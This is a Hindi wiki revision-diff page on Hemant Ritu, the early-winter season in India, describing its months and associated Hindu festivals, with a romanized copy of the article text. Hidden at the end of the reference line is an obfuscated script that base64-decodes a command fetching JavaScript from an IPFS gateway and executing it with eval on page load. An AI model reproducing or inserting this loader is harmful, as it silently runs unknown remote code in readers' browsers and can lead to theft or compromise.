Difference between revisions of "हेमन्त ऋतु"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''हेमन्त ऋतु''' भारत की 6 ऋतुओं में से एक ऋतु है...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''हेमन्त ऋतु''' [[भारत]] की 6 [[ऋतुएँ|ऋतुओं]] में से एक ऋतु है। [[अंग्रेज़ी]] कलेंडर के अनुसार [[दिसम्बर]] से [[जनवरी]] माह में हेमन्त ऋतु रहती है। [[विक्रमी संवत]] के अनुसार [[मार्गशीर्ष]] और [[पौष मास|पौष]] 'हेमन्त ऋतु' के [[मास]] हैं। इस ऋतु में शरीर प्राय स्वस्थ रहता है। पाचन शक्ति बढ़ जाती है।  
+
'''हेमन्त ऋतु''' [[भारत]] की 6 [[ऋतुएँ|ऋतुओं]] में से एक ऋतु है। [[विक्रमी संवत]] के अनुसार [[मार्गशीर्ष]] और [[पौष मास|पौष]] 'हेमन्त ऋतु' के [[मास]] हैं। इस ऋतु में शरीर प्राय स्वस्थ रहता है। पाचन शक्ति बढ़ जाती है। [[शीत ऋतु]] दो भागों में विभक्त है। हल्के गुलाबी जाड़े को हेमंत ऋतु का नाम दिया गया है और तीव्र तथा तीखे जाड़े को [[शिशिर ऋतु|शिशिर]]। दोनों ऋतुओं ने हमारी परंपराओं को अनेक रूपों में प्रभावित किया है।
 +
==धार्मिक महत्त्व==
 +
हेमंत ऋतु अर्थात् मार्गशीष और पौष मास में वृश्चिक और धनु राशियाँ संक्रमण करती हैं। [[बसंत ऋतु|बसंत]], [[ग्रीष्म ऋतु|ग्रीष्म]] और [[वर्षा ऋतु|वर्षा]] देवी ऋतु हैं तो शरद, हेमंत और शिशिर पितरों की ऋतु है। हेमंत ऋतु में [[कार्तिक]], [[अगहन]] और [[पौष]] मास पड़ते हैं। कार्तिक मास में [[करवा चौथ]], [[धनतेरस]], [[रूप चतुर्दशी]], [[दीपावली]], [[गोवर्धन पूजा]], [[भाई दूज]] आदि तीज-त्योहार आते हैं, वहीं कार्तिक स्नान पूर्ण होकर दीपदान होता है।
 +
इस माह में [[उज्जैन]] में [[महाकालेश्वर]] की दो सवारी कार्तिक और दो सवारी अगहन मास में निकलती हैं। कार्तिक शुक्ल [[प्रबोधिनी एकादशी]] पर [[तुलसी विवाह]] होता है और चातुर्मास की समाप्ति होती है, तो बैकुंठ चतुर्दशी पर हरिहर मिलन भी इसी मास में हो जाता है। अगहन अर्थात् मार्गशीर्ष मास में [[गीता जयंती]], [[सोमवती अमावस्या]] के अलावा काल भैरव तथा आताल-पाताल भैरव की सवारी भी निकलती है। पौष मास में हनुमान अष्टमी, पार्श्वनाथ जयंती आदि के अलावा [[रविवार]] को सूर्य उपासना का विशेष महत्व है।<ref>{{cite web |url=http://hindi.webdunia.com/article/astrology-articles/%E0%A4%B9%E0%A5%87%E0%A4%AE%E0%A4%82%E0%A4%A4-%E0%A4%95%E0%A5%80-%E0%A4%B8%E0%A5%81%E0%A4%82%E0%A4%A6%E0%A4%B0-%E0%A4%8B%E0%A4%A4%E0%A5%81-%E0%A4%94%E0%A4%B0-%E0%A4%A7%E0%A4%B0%E0%A5%8D%E0%A4%AE-110102400014_1.htm |title=हेमंत की सुंदर ऋतु और धर्म |accessmonthday=23 जनवरी|accessyear=2018 |last= |first= |authorlink= |format= |publisher=वेब दुनिया|language=हिंदी }}</ref>
  
  
Line 5: Line 8:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
*[http://hindikaraslo.blogspot.in/2012/03/blog-post_2298.html हेमंत ऋतु]
 
*[http://hindikaraslo.blogspot.in/2012/03/blog-post_2298.html हेमंत ऋतु]

Revision as of 13:44, 23 January 2018

hemant rritu bharat ki 6 rrituoan mean se ek rritu hai. vikrami sanvat ke anusar margashirsh aur paush 'hemant rritu' ke mas haian. is rritu mean sharir pray svasth rahata hai. pachan shakti badh jati hai. shit rritu do bhagoan mean vibhakt hai. halke gulabi ja de ko hemant rritu ka nam diya gaya hai aur tivr tatha tikhe ja de ko shishir. donoan rrituoan ne hamari paranparaoan ko anek roopoan mean prabhavit kiya hai.

dharmik mahattv

hemant rritu arthath margashish aur paush mas mean vrishchik aur dhanu rashiyaan sankraman karati haian. basant, grishm aur varsha devi rritu haian to sharad, hemant aur shishir pitaroan ki rritu hai. hemant rritu mean kartik, agahan aur paush mas p date haian. kartik mas mean karava chauth, dhanateras, roop chaturdashi, dipavali, govardhan pooja, bhaee dooj adi tij-tyohar ate haian, vahian kartik snan poorn hokar dipadan hota hai. is mah mean ujjain mean mahakaleshvar ki do savari kartik aur do savari agahan mas mean nikalati haian. kartik shukl prabodhini ekadashi par tulasi vivah hota hai aur chaturmas ki samapti hoti hai, to baikuanth chaturdashi par harihar milan bhi isi mas mean ho jata hai. agahan arthath margashirsh mas mean gita jayanti, somavati amavasya ke alava kal bhairav tatha atal-patal bhairav ki savari bhi nikalati hai. paush mas mean hanuman ashtami, parshvanath jayanti adi ke alava ravivar ko soory upasana ka vishesh mahatv hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemant ki suandar rritu aur dharm (hiandi) veb duniya. abhigaman tithi: 23 janavari, 2018.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh